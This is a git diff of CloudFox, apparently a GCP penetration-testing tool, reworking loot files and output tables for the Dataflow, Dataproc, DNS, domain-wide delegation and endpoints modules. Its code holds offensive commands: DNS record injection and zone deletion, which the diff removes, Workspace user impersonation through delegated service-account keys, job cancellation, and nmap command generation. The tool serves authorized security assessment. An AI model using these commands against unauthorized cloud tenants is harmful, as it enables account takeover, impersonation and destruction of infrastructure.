m.LootMap["dataflow-service-accounts"] = &internal.LootFile{ - Name: "dataflow-service-accounts", - Contents: "", + m.LootMap["dataflow-commands"] = &internal.LootFile{ + Name: "dataflow-commands", + Contents: "# Dataflow Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *DataflowModule) addToLoot(job dataflowservice.JobInfo) { - m.LootMap["dataflow-jobs"].Contents += fmt.Sprintf( - "# Job: %s (%s)\n# Type: %s\n# State: %s\n# Service Account: %s\n# Public IPs: %v\n\n", - job.Name, job.ID, job.Type, job.State, job.ServiceAccount, job.UsePublicIPs) - - if job.ServiceAccount != "" { - m.LootMap["dataflow-service-accounts"].Contents += job.ServiceAccount + "\n" - } + m.LootMap["dataflow-commands"].Contents += fmt.Sprintf( + "## Job: %s (Project: %s, Location: %s)\n"+ + "# ID: %s\n"+ + "# Type: %s\n"+ + "# State: %s\n"+ + "# Service Account: %s\n"+ + "# Public IPs: %v\n"+ + "# Workers: %d\n\n"+ + "# Describe job:\n"+ + "gcloud dataflow jobs describe %s --project=%s --region=%s\n"+ + "# Show job details:\n"+ + "gcloud dataflow jobs show %s --project=%s --region=%s\n"+ + "# Cancel job (if running):\n"+ + "gcloud dataflow jobs cancel %s --project=%s --region=%s\n\n", + job.Name, job.ProjectID, job.Location, + job.ID, + job.Type, + job.State, + job.ServiceAccount, + job.UsePublicIPs, + job.NumWorkers, + job.ID, job.ProjectID, job.Location, + job.ID, job.ProjectID, job.Location, + job.ID, job.ProjectID, job.Location, + ) } func (m *DataflowModule) writeOutput(ctx context.Context, logger internal.Logger) { header := []string{ - "Name", "Type", "State", "Location", "Service Account", - "Public IPs", "Workers", "Risk", "Project Name", "Project", + "Project ID", + "Project Name", + "Name", + "Type", + "State", + "Location", + "Service Account", + "Public IPs", + "Workers", } var body [][]string @@ -139,58 +160,28 @@ func (m *DataflowModule) writeOutput(ctx context.Context, logger internal.Logger publicIPs = "Yes" } - sa := job.ServiceAccount - if sa == "" { - sa = "(default)" - } else if len(sa) > 40 { - sa = sa[:37] + "..." - } - body = append(body, []string{ + job.ProjectID, + m.GetProjectName(job.ProjectID), job.Name, job.Type, job.State, job.Location, - sa, + job.ServiceAccount, publicIPs, fmt.Sprintf("%d", job.NumWorkers), - job.RiskLevel, - m.GetProjectName(job.ProjectID), - job.ProjectID, }) } var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } tables := []internal.TableFile{{Name: "dataflow", Header: header, Body: body}} - // High-risk jobs table - var highRiskBody [][]string - for _, job := range m.Jobs { - if job.RiskLevel == "HIGH" || job.RiskLevel == "MEDIUM" { - highRiskBody = append(highRiskBody, []string{ - job.Name, - job.RiskLevel, - strings.Join(job.RiskReasons, "; "), - m.GetProjectName(job.ProjectID), - job.ProjectID, - }) - } - } - - if len(highRiskBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "dataflow-risks", - Header: []string{"Job", "Risk Level", "Reasons", "Project Name", "Project"}, - Body: highRiskBody, - }) - } - output := DataflowOutput{Table: tables, Loot: lootFiles} scopeNames := make([]string, len(m.ProjectIDs)) diff --git a/gcp/commands/dataproc.go b/gcp/commands/dataproc.go index 54415201..ae6fdfdf 100644 --- a/gcp/commands/dataproc.go +++ b/gcp/commands/dataproc.go @@ -106,102 +106,119 @@ func (m *DataprocModule) processProject(ctx context.Context, projectID string, l } func (m *DataprocModule) initializeLootFiles() { - m.LootMap["dataproc-clusters"] = &internal.LootFile{ - Name: "dataproc-clusters", - Contents: "# Dataproc Clusters\n# Generated by CloudFox\n\n", - } - m.LootMap["dataproc-service-accounts"] = &internal.LootFile{ - Name: "dataproc-service-accounts", - Contents: "", - } - m.LootMap["dataproc-buckets"] = &internal.LootFile{ - Name: "dataproc-buckets", - Contents: "", + m.LootMap["dataproc-commands"] = &internal.LootFile{ + Name: "dataproc-commands", + Contents: "# Dataproc Commands\n# Generated by CloudFox\n\n", } } func (m *DataprocModule) addToLoot(cluster dataprocservice.ClusterInfo) { - m.LootMap["dataproc-clusters"].Contents += fmt.Sprintf( - "# Cluster: %s\n# Region: %s\n# State: %s\n# Service Account: %s\n# Public IPs: %v\n\n", - cluster.Name, cluster.Region, cluster.State, cluster.ServiceAccount, !cluster.InternalIPOnly) - - if cluster.ServiceAccount != "" { - m.LootMap["dataproc-service-accounts"].Contents += cluster.ServiceAccount + "\n" - } - + m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Project: %s\n", + cluster.Name, cluster.Region, + cluster.ProjectID, + ) + + // gcloud commands + m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + "gcloud dataproc clusters describe %s --region=%s --project=%s\n"+ + "gcloud dataproc jobs list --cluster=%s --region=%s --project=%s\n", + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + ) + + // Bucket commands if cluster.ConfigBucket != "" { - m.LootMap["dataproc-buckets"].Contents += fmt.Sprintf("gs://%s # config bucket for %s\n", cluster.ConfigBucket, cluster.Name) + m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + "gsutil ls gs://%s/\n", + cluster.ConfigBucket, + ) } if cluster.TempBucket != "" { - m.LootMap["dataproc-buckets"].Contents += fmt.Sprintf("gs://%s # temp bucket for %s\n", cluster.TempBucket, cluster.Name) + m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + "gsutil ls gs://%s/\n", + cluster.TempBucket, + ) } + + m.LootMap["dataproc-commands"].Contents += "\n" } func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger) { - var tables []internal.TableFile + // Single table with one row per IAM binding + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "State", + "Master", + "Master Instances", + "Workers", + "Service Account", + "Public IPs", + "Kerberos", + "IAM Role", + "IAM Member", + } - // Clusters table - header := []string{"Name", "Region", "State", "Master", "Workers", "Service Account", "Public IPs", "Kerberos", "Risk", "Project Name", "Project"} var body [][]string for _, cluster := range m.Clusters { - publicIPs := "No" - if !cluster.InternalIPOnly { - publicIPs = "Yes" - } - kerberos := "No" - if cluster.KerberosEnabled { - kerberos = "Yes" - } sa := cluster.ServiceAccount if sa == "" { sa = "(default)" - } else if len(sa) > 35 { - sa = sa[:32] + "..." } + masterConfig := fmt.Sprintf("%s x%d", cluster.MasterMachineType, cluster.MasterCount) workerConfig := fmt.Sprintf("%s x%d", cluster.WorkerMachineType, cluster.WorkerCount) - body = append(body, []string{ - cluster.Name, - cluster.Region, - cluster.State, - masterConfig, - workerConfig, - sa, - publicIPs, - kerberos, - cluster.RiskLevel, - m.GetProjectName(cluster.ProjectID), - cluster.ProjectID, - }) - } - tables = append(tables, internal.TableFile{ - Name: "dataproc-clusters", - Header: header, - Body: body, - }) - - // High-risk findings - var highRiskBody [][]string - for _, cluster := range m.Clusters { - if cluster.RiskLevel == "HIGH" || cluster.RiskLevel == "MEDIUM" { - highRiskBody = append(highRiskBody, []string{ - cluster.Name, - cluster.RiskLevel, - strings.Join(cluster.RiskReasons, "; "), + // Master instances + masterInstances := "-" + if len(cluster.MasterInstanceNames) > 0 { + masterInstances = strings.Join(cluster.MasterInstanceNames, ", ") + } + + // If cluster has IAM bindings, create one row per binding + if len(cluster.IAMBindings) > 0 { + for _, binding := range cluster.IAMBindings { + body = append(body, []string{ + m.GetProjectName(cluster.ProjectID), + cluster.ProjectID, + cluster.Name, + cluster.Region, + cluster.State, + masterConfig, + masterInstances, + workerConfig, + sa, + boolToYesNo(!cluster.InternalIPOnly), + boolToYesNo(cluster.KerberosEnabled), + binding.Role, + binding.Member, + }) + } + } else { + // Cluster has no IAM bindings - single row + body = append(body, []string{ m.GetProjectName(cluster.ProjectID), cluster.ProjectID, + cluster.Name, + cluster.Region, + cluster.State, + masterConfig, + masterInstances, + workerConfig, + sa, + boolToYesNo(!cluster.InternalIPOnly), + boolToYesNo(cluster.KerberosEnabled), + "-", + "-", }) } } - if len(highRiskBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "dataproc-risks", - Header: []string{"Cluster", "Risk Level", "Reasons", "Project Name", "Project"}, - Body: highRiskBody, - }) - } + tables := []internal.TableFile{{Name: "dataproc-clusters", Header: header, Body: body}} var lootFiles []internal.LootFile for _, loot := range m.LootMap { diff --git a/gcp/commands/dns.go b/gcp/commands/dns.go index f578680c..9efb9b06 100644 --- a/gcp/commands/dns.go +++ b/gcp/commands/dns.go @@ -168,107 +168,40 @@ func (m *DNSModule) processProject(ctx context.Context, projectID string, logger // Loot File Management // ------------------------------ func (m *DNSModule) initializeLootFiles() { - m.LootMap["dns-gcloud-commands"] = &internal.LootFile{ - Name: "dns-gcloud-commands", - Contents: "# Cloud DNS gcloud Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["dns-public-zones"] = &internal.LootFile{ - Name: "dns-public-zones", - Contents: "# Public DNS Zones\n# Generated by CloudFox\n# These zones are publicly resolvable\n\n", - } - m.LootMap["dns-txt-records"] = &internal.LootFile{ - Name: "dns-txt-records", - Contents: "# DNS TXT Records\n# Generated by CloudFox\n# May contain SPF, DKIM, verification tokens, etc.\n\n", - } - m.LootMap["dns-a-records"] = &internal.LootFile{ - Name: "dns-a-records", - Contents: "# DNS A Records\n# Generated by CloudFox\n# IP addresses associated with domains\n\n", - } - m.LootMap["dns-exploitation"] = &internal.LootFile{ - Name: "dns-exploitation", - Contents: "# DNS Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + m.LootMap["dns-commands"] = &internal.LootFile{ + Name: "dns-commands", + Contents: "# Cloud DNS Commands\n# Generated by CloudFox\n\n", } } func (m *DNSModule) addZoneToLoot(zone DNSService.ZoneInfo) { - // gcloud commands - m.LootMap["dns-gcloud-commands"].Contents += fmt.Sprintf( - "# Zone: %s (Project: %s)\n"+ - "gcloud dns managed-zones describe %s --project=%s\n"+ - "gcloud dns record-sets list --zone=%s --project=%s\n\n", - zone.Name, zone.ProjectID, - zone.Name, zone.ProjectID, - zone.Name, zone.ProjectID, + m.LootMap["dns-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Project: %s | Visibility: %s\n", + zone.Name, zone.DNSName, + zone.ProjectID, zone.Visibility, ) - // Public zones - if zone.Visibility == "public" { - m.LootMap["dns-public-zones"].Contents += fmt.Sprintf( - "# Zone: %s\n"+ - "# DNS Name: %s\n"+ - "# Project: %s\n"+ - "# DNSSEC: %s\n\n", - zone.Name, - zone.DNSName, - zone.ProjectID, - zone.DNSSECState, - ) - } - - // Exploitation commands - m.LootMap["dns-exploitation"].Contents += fmt.Sprintf( - "# Zone: %s (Project: %s)\n"+ - "# DNS Name: %s\n"+ - "# Visibility: %s\n", + // gcloud commands + m.LootMap["dns-commands"].Contents += fmt.Sprintf( + "gcloud dns managed-zones describe %s --project=%s\n"+ + "gcloud dns record-sets list --zone=%s --project=%s\n", zone.Name, zone.ProjectID, - zone.DNSName, - zone.Visibility, - ) - - if len(zone.PrivateNetworks) > 0 { - m.LootMap["dns-exploitation"].Contents += fmt.Sprintf( - "# Private Networks: %s\n", - strings.Join(zone.PrivateNetworks, ", "), - ) - } - - m.LootMap["dns-exploitation"].Contents += fmt.Sprintf( - "\n# Add a record (if you have dns.changes.create):\n"+ - "gcloud dns record-sets create attacker.%s --type=A --ttl=300 --rrdatas=\"1.2.3.4\" --zone=%s --project=%s\n\n"+ - "# Delete zone (if you have dns.managedZones.delete):\n"+ - "gcloud dns managed-zones delete %s --project=%s\n\n", - zone.DNSName, zone.Name, zone.ProjectID, zone.Name, zone.ProjectID, ) + + m.LootMap["dns-commands"].Contents += "\n" } func (m *DNSModule) addRecordToLoot(record DNSService.RecordInfo, zone DNSService.ZoneInfo) { - // TXT records (may contain sensitive info) - if record.Type == "TXT" { - m.LootMap["dns-txt-records"].Contents += fmt.Sprintf( - "# %s (Zone: %s)\n", - record.Name, zone.DNSName, - ) - for _, data := range record.RRDatas { - m.LootMap["dns-txt-records"].Contents += fmt.Sprintf("%s\n", data) - } - m.LootMap["dns-txt-records"].Contents += "\n" - } - - // A records (IP addresses) - if record.Type == "A" || record.Type == "AAAA" { - m.LootMap["dns-a-records"].Contents += fmt.Sprintf( - "%s\t%s\t%s\n", - record.Name, record.Type, strings.Join(record.RRDatas, ", "), - ) - } + // Records are displayed in the table, no separate loot needed } // ------------------------------ // Output Generation // ------------------------------ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Zones table + // Zones table with IAM bindings (one row per IAM binding) zonesHeader := []string{ "Project Name", "Project ID", @@ -278,6 +211,8 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { "DNSSEC", "Networks/Peering", "Forwarding", + "IAM Role", + "IAM Member", } var zonesBody [][]string @@ -305,19 +240,40 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { forwarding = strings.Join(zone.ForwardingTargets, ", ") } - zonesBody = append(zonesBody, []string{ - m.GetProjectName(zone.ProjectID), - zone.ProjectID, - zone.Name, - zone.DNSName, - zone.Visibility, - dnssec, - networkInfo, - forwarding, - }) + // If zone has IAM bindings, create one row per binding + if len(zone.IAMBindings) > 0 { + for _, binding := range zone.IAMBindings { + zonesBody = append(zonesBody, []string{ + m.GetProjectName(zone.ProjectID), + zone.ProjectID, + zone.Name, + zone.DNSName, + zone.Visibility, + dnssec, + networkInfo, + forwarding, + binding.Role, + binding.Member, + }) + } + } else { + // Zone has no IAM bindings - single row + zonesBody = append(zonesBody, []string{ + m.GetProjectName(zone.ProjectID), + zone.ProjectID, + zone.Name, + zone.DNSName, + zone.Visibility, + dnssec, + networkInfo, + forwarding, + "-", + "-", + }) + } } - // Records table (interesting types only) + // Records table (interesting types only, no truncation) recordsHeader := []string{ "Zone", "Name", @@ -333,11 +289,8 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { continue } - // Format data + // Format data - no truncation data := strings.Join(record.RRDatas, ", ") - if len(data) > 60 { - data = data[:57] + "..." - } recordsBody = append(recordsBody, []string{ record.ZoneName, diff --git a/gcp/commands/domainwidedelegation.go b/gcp/commands/domainwidedelegation.go index 9c0d748f..98dcef43 100644 --- a/gcp/commands/domainwidedelegation.go +++ b/gcp/commands/domainwidedelegation.go @@ -152,69 +152,37 @@ func (m *DomainWideDelegationModule) processProject(ctx context.Context, project // Loot File Management // ------------------------------ func (m *DomainWideDelegationModule) initializeLootFiles() { - m.LootMap["dwd-accounts"] = &internal.LootFile{ - Name: "dwd-accounts", - Contents: "# Domain-Wide Delegation Service Accounts\n# Generated by CloudFox\n\n", - } - m.LootMap["dwd-critical"] = &internal.LootFile{ - Name: "dwd-critical", - Contents: "# CRITICAL: DWD Accounts with Keys\n# Generated by CloudFox\n# These can impersonate any Google Workspace user!\n\n", - } - m.LootMap["dwd-exploit-commands"] = &internal.LootFile{ - Name: "dwd-exploit-commands", - Contents: "# DWD Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + m.LootMap["dwd-commands"] = &internal.LootFile{ + Name: "dwd-commands", + Contents: "# Domain-Wide Delegation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *DomainWideDelegationModule) addAccountToLoot(account domainwidedelegationservice.DWDServiceAccount) { - // All DWD accounts - m.LootMap["dwd-accounts"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Project: %s\n"+ - "## DWD Enabled: %v\n"+ - "## OAuth2 Client ID: %s\n"+ - "## Has Keys: %v (Count: %d)\n", - account.RiskLevel, account.Email, - account.ProjectID, - account.DWDEnabled, - account.OAuth2ClientID, - account.HasKeys, account.KeyCount, - ) - for _, reason := range account.RiskReasons { - m.LootMap["dwd-accounts"].Contents += fmt.Sprintf("## - %s\n", reason) - } - m.LootMap["dwd-accounts"].Contents += "\n" - - // Critical accounts - if account.RiskLevel == "CRITICAL" { - m.LootMap["dwd-critical"].Contents += fmt.Sprintf( - "## [CRITICAL] %s\n"+ - "## Project: %s\n"+ - "## OAuth2 Client ID: %s\n"+ - "## Keys: %d user-managed key(s)\n"+ - "##\n"+ - "## This service account can impersonate ANY user in the Workspace domain!\n"+ - "## To exploit:\n"+ - "## 1. Create/download a key for this SA\n"+ - "## 2. Use the key with a target user email as 'subject'\n"+ - "## 3. Access Gmail, Drive, Calendar, etc. as that user\n\n", - account.Email, - account.ProjectID, - account.OAuth2ClientID, - account.KeyCount, - ) - } - - // Exploit commands + // Add exploit commands for each account if len(account.ExploitCommands) > 0 { - m.LootMap["dwd-exploit-commands"].Contents += fmt.Sprintf( - "## [%s] %s\n", - account.RiskLevel, account.Email, + m.LootMap["dwd-commands"].Contents += fmt.Sprintf( + "## Service Account: %s (Project: %s)\n"+ + "# DWD Enabled: %v\n"+ + "# OAuth2 Client ID: %s\n"+ + "# Keys: %d user-managed key(s)\n", + account.Email, account.ProjectID, + account.DWDEnabled, + account.OAuth2ClientID, + len(account.Keys), ) + // List key details + for _, key := range account.Keys { + m.LootMap["dwd-commands"].Contents += fmt.Sprintf( + "# - Key ID: %s (Created: %s, Expires: %s, Algorithm: %s)\n", + key.KeyID, key.CreatedAt, key.ExpiresAt, key.KeyAlgorithm, + ) + } + m.LootMap["dwd-commands"].Contents += "\n" for _, cmd := range account.ExploitCommands { - m.LootMap["dwd-exploit-commands"].Contents += cmd + "\n" + m.LootMap["dwd-commands"].Contents += cmd + "\n" } - m.LootMap["dwd-exploit-commands"].Contents += "\n" + m.LootMap["dwd-commands"].Contents += "\n" } } @@ -222,64 +190,66 @@ func (m *DomainWideDelegationModule) addAccountToLoot(account domainwidedelegati // Output Generation // ------------------------------ func (m *DomainWideDelegationModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main table + // Main table - one row per key (or one row if no keys) header := []string{ - "Risk", + "Project ID", + "Project Name", "Email", "DWD Enabled", "OAuth2 Client ID", - "Keys", - "Project Name", - "Project", + "Key ID", + "Key Created", + "Key Expires", + "Key Algorithm", } var body [][]string for _, account := range m.DWDAccounts { dwdStatus := "No" if account.DWDEnabled { - dwdStatus = "YES" + dwdStatus = "Yes" } clientID := account.OAuth2ClientID if clientID == "" { clientID = "-" - } else if len(clientID) > 20 { - clientID = clientID[:20] + "..." } - keysDisplay := "-" - if account.HasKeys { - keysDisplay = fmt.Sprintf("%d key(s)", account.KeyCount) - } - - // Shorten email for display - email := account.Email - if len(email) > 40 { - parts := strings.Split(email, "@") - if len(parts) == 2 { - username := parts[0] - if len(username) > 15 { - username = username[:15] + "..." - } - email = username + "@" + parts[1] + if len(account.Keys) > 0 { + // One row per key + for _, key := range account.Keys { + body = append(body, []string{ + account.ProjectID, + m.GetProjectName(account.ProjectID), + account.Email, + dwdStatus, + clientID, + key.KeyID, + key.CreatedAt, + key.ExpiresAt, + key.KeyAlgorithm, + }) } + } else { + // Account with no keys - still show it + body = append(body, []string{ + account.ProjectID, + m.GetProjectName(account.ProjectID), + account.Email, + dwdStatus, + clientID, + "-", + "-", + "-", + "-", + }) } - - body = append(body, []string{ - account.RiskLevel, - email, - dwdStatus, - clientID, - keysDisplay, - m.GetProjectName(account.ProjectID), - account.ProjectID, - }) } // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/endpoints.go b/gcp/commands/endpoints.go index bce60026..1f3baa78 100644 --- a/gcp/commands/endpoints.go +++ b/gcp/commands/endpoints.go @@ -6,61 +6,91 @@ import ( "strings" "sync" - networkservice "github.com/BishopFox/cloudfox/gcp/services/networkService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" + compute "google.golang.org/api/compute/v1" + run "google.golang.org/api/run/v1" ) var GCPEndpointsCommand = &cobra.Command{ - Use: globals.GCP_ENDPOINTS_MODULE_NAME, - Aliases: []string{"external", "public-ips", "ips"}, - Short: "Aggregate all public-facing endpoints in GCP", - Long: `Aggregate and analyze all public-facing endpoints across GCP resources. + Use: "endpoints", + Aliases: []string{"exposure", "external", "public-ips", "internet-facing"}, + Short: "Enumerate all network endpoints (external and internal) with IPs, ports, and hostnames", + Long: `Enumerate all network endpoints in GCP with comprehensive analysis. Features: - Enumerates external IP addresses (static and ephemeral) -- Lists load balancers (HTTP(S), TCP, UDP) -- Shows Cloud NAT gateways -- Identifies VPN gateways and Cloud Interconnect -- Maps forwarding rules to backends -- Lists Cloud Run, App Engine, and Cloud Functions URLs -- Identifies public Cloud SQL instances -- Shows GKE ingress endpoints`, +- Enumerates internal IP addresses for instances +- Lists load balancers (HTTP(S), TCP, UDP) - both external and internal +- Shows instances with external and internal IPs +- Lists Cloud Run and Cloud Functions URLs +- Analyzes firewall rules to determine open ports +- Generates nmap commands for penetration testing + +Output includes separate tables and loot files for external and internal endpoints.`, Run: runGCPEndpointsCommand, } -// EndpointInfo represents a public-facing endpoint -type EndpointInfo struct { - Name string `json:"name"` - Type string `json:"type"` // IP, LoadBalancer, Function, CloudRun, etc. - Address string `json:"address"` - Protocol string `json:"protocol"` - Port string `json:"port"` - Resource string `json:"resource"` // Associated resource - ResourceType string `json:"resourceType"` // Instance, ForwardingRule, etc. - Region string `json:"region"` - ProjectID string `json:"projectId"` - Status string `json:"status"` - Description string `json:"description"` +// ------------------------------ +// Data Structures +// ------------------------------ + +type Endpoint struct { + ProjectID string + Name string + Type string // Static IP, Instance IP, LoadBalancer, Cloud Run, etc. + Address string + FQDN string + Protocol string + Port string + Resource string + ResourceType string + Region string + Status string + ServiceAccount string + TLSEnabled bool + RiskLevel string + RiskReasons []string + IsExternal bool // true for external IPs, false for internal + NetworkTags []string // Tags for firewall rule matching + Network string // VPC network name +} + +type FirewallRule struct { + ProjectID string + RuleName string + Network string + Direction string + SourceRanges []string + Ports []string + Protocol string + TargetTags []string + RiskLevel string + RiskReasons []string } // ------------------------------ -// Module Struct with embedded BaseGCPModule +// Module Struct // ------------------------------ type EndpointsModule struct { gcpinternal.BaseGCPModule - // Module-specific fields - Endpoints []EndpointInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ExternalEndpoints []Endpoint + InternalEndpoints []Endpoint + FirewallRules []FirewallRule + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Firewall rule mapping: "network:tag1,tag2" -> allowed ports + // Key format: "network-name" for rules with no target tags, or "network-name:tag1,tag2" for tagged rules + firewallPortMap map[string][]string } // ------------------------------ -// Output Struct implementing CloudfoxOutput interface +// Output Struct // ------------------------------ type EndpointsOutput struct { Table []internal.TableFile @@ -74,23 +104,21 @@ func (o EndpointsOutput) LootFiles() []internal.LootFile { return o.Loot } // Command Entry Point // ------------------------------ func runGCPEndpointsCommand(cmd *cobra.Command, args []string) { - // Initialize command context - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ENDPOINTS_MODULE_NAME) + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, "endpoints") if err != nil { - return // Error already logged + return } - // Create module instance module := &EndpointsModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Endpoints: []EndpointInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ExternalEndpoints: []Endpoint{}, + InternalEndpoints: []Endpoint{}, + FirewallRules: []FirewallRule{}, + LootMap: make(map[string]*internal.LootFile), + firewallPortMap: make(map[string][]string), } - // Initialize loot files module.initializeLootFiles() - - // Execute enumeration module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -98,120 +126,92 @@ func runGCPEndpointsCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *EndpointsModule) Execute(ctx context.Context, logger internal.Logger) { - // Run enumeration with concurrency - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ENDPOINTS_MODULE_NAME, m.processProject) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, "endpoints", m.processProject) - // Check results - if len(m.Endpoints) == 0 { - logger.InfoM("No public endpoints found", globals.GCP_ENDPOINTS_MODULE_NAME) + totalEndpoints := len(m.ExternalEndpoints) + len(m.InternalEndpoints) + if totalEndpoints == 0 && len(m.FirewallRules) == 0 { + logger.InfoM("No endpoints found", "endpoints") return } - // Count by type - typeCounts := make(map[string]int) - for _, ep := range m.Endpoints { - typeCounts[ep.Type]++ - } - - summary := []string{} - for t, c := range typeCounts { - summary = append(summary, fmt.Sprintf("%d %s", c, t)) - } - - logger.SuccessM(fmt.Sprintf("Found %d public endpoint(s): %s", - len(m.Endpoints), strings.Join(summary, ", ")), globals.GCP_ENDPOINTS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d external endpoint(s), %d internal endpoint(s), %d firewall rule(s)", + len(m.ExternalEndpoints), len(m.InternalEndpoints), len(m.FirewallRules)), "endpoints") - // Write output m.writeOutput(ctx, logger) } // ------------------------------ -// Project Processor (called concurrently for each project) +// Project Processor // ------------------------------ func (m *EndpointsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Enumerating public endpoints in project: %s", projectID), globals.GCP_ENDPOINTS_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Analyzing endpoints in project: %s", projectID), "endpoints") } - var endpoints []EndpointInfo - - // Create compute service - networkSvc := networkservice.New() - computeSvc, err := networkSvc.GetComputeService(ctx) + computeService, err := compute.NewService(ctx) if err != nil { m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_ENDPOINTS_MODULE_NAME, - fmt.Sprintf("Could not create compute service in project %s", projectID)) + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not create Compute service in project %s", projectID)) return } - // 1. Get external IP addresses - ipEndpoints := m.getExternalIPs(ctx, computeSvc, projectID, logger) - endpoints = append(endpoints, ipEndpoints...) - - // 2. Get forwarding rules (load balancers) - fwdEndpoints := m.getForwardingRules(ctx, computeSvc, projectID, logger) - endpoints = append(endpoints, fwdEndpoints...) - - // 3. Get global forwarding rules - globalFwdEndpoints := m.getGlobalForwardingRules(ctx, computeSvc, projectID, logger) - endpoints = append(endpoints, globalFwdEndpoints...) + // 1. Analyze firewall rules FIRST to build port mapping for instances + m.analyzeFirewallRules(ctx, computeService, projectID, logger) - // 4. Get instances with external IPs - instanceEndpoints := m.getInstanceExternalIPs(ctx, computeSvc, projectID, logger) - endpoints = append(endpoints, instanceEndpoints...) + // 2. Get static external IPs + m.getStaticExternalIPs(ctx, computeService, projectID, logger) - // Thread-safe append - m.mu.Lock() - m.Endpoints = append(m.Endpoints, endpoints...) + // 3. Get instances (both external and internal IPs) + m.getInstanceIPs(ctx, computeService, projectID, logger) - // Generate loot - for _, ep := range endpoints { - m.addEndpointToLoot(ep) - } - m.mu.Unlock() + // 4. Get load balancers (both external and internal) + m.getLoadBalancers(ctx, computeService, projectID, logger) - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Found %d public endpoint(s) in project %s", len(endpoints), projectID), globals.GCP_ENDPOINTS_MODULE_NAME) - } + // 5. Get Cloud Run services (always external) + m.getCloudRunServices(ctx, projectID, logger) } -// getExternalIPs retrieves static external IP addresses -func (m *EndpointsModule) getExternalIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) []EndpointInfo { - var endpoints []EndpointInfo - - // Get global addresses +// getStaticExternalIPs retrieves static external IP addresses +func (m *EndpointsModule) getStaticExternalIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Global addresses req := svc.GlobalAddresses.List(projectID) err := req.Pages(ctx, func(page *compute.AddressList) error { for _, addr := range page.Items { if addr.AddressType == "EXTERNAL" { - user := "-" + user := "" if len(addr.Users) > 0 { user = extractResourceName(addr.Users[0]) } - ep := EndpointInfo{ + ep := Endpoint{ + ProjectID: projectID, Name: addr.Name, Type: "Static IP", Address: addr.Address, - Protocol: "-", - Port: "-", + Protocol: "TCP/UDP", + Port: "ALL", Resource: user, ResourceType: "Address", Region: "global", - ProjectID: projectID, Status: addr.Status, - Description: addr.Description, + RiskLevel: "Medium", + RiskReasons: []string{"Static external IP"}, + IsExternal: true, } - endpoints = append(endpoints, ep) + if user == "" { + ep.RiskReasons = append(ep.RiskReasons, "Unused static IP") + } + m.addEndpoint(ep) } } return nil }) if err != nil { - logger.InfoM(fmt.Sprintf("Could not list global addresses: %v", err), globals.GCP_ENDPOINTS_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list global addresses in project %s", projectID)) } - // Get regional addresses + // Regional addresses regionsReq := svc.Regions.List(projectID) err = regionsReq.Pages(ctx, func(page *compute.RegionList) error { for _, region := range page.Items { @@ -219,46 +219,206 @@ func (m *EndpointsModule) getExternalIPs(ctx context.Context, svc *compute.Servi err := addrReq.Pages(ctx, func(addrPage *compute.AddressList) error { for _, addr := range addrPage.Items { if addr.AddressType == "EXTERNAL" { - user := "-" + user := "" if len(addr.Users) > 0 { user = extractResourceName(addr.Users[0]) } - ep := EndpointInfo{ + ep := Endpoint{ + ProjectID: projectID, Name: addr.Name, Type: "Static IP", 